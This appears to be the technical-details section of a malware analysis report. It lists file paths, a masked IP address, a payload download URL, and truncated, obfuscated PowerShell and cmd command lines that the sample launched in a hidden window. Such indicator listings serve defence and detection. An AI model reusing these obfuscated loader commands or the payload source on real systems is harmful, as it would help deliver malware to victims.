Technical Information
- %APPDATA%\bit7b37.tmp
- from %APPDATA%\bit7b37.tmp to %APPDATA%\kumpaners.non
- '69.##.224.166':80
- http://69.##.224.166/max/Amphigaea.lpk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#Bogyism Suiogoth Skuringers karrys Ticktacking Rntgenrum Apographal #>;$employeer=(cmd /c set /A 115^^0);Function jasmone ([String]$Afriver){$employeer=[char][int]$employeer;$balsamenes=$emp...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#Bogyism Suiogoth Skuringers karrys Ticktacking Rntgenrum Apographal #>;$employeer=(cmd /c set /A 115^^0);Function jasmone ([String]$Afriver){$employeer=[char][int]$employeer;$balsamenes=$emp...
- '<SYSTEM32>\cmd.exe' /c set /A 115^^0
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "<#Bogyism Suiogoth Skuringers karrys Ticktacking Rntgenrum Apographal #>;$employeer=(cmd /c set /A 115^^0);Function jasmone ([String]$Afriver){$employeer=[char][int]$employeer;$balsamenes=$emp...
- '%WINDIR%\syswow64\cmd.exe' /c set /A 115^^0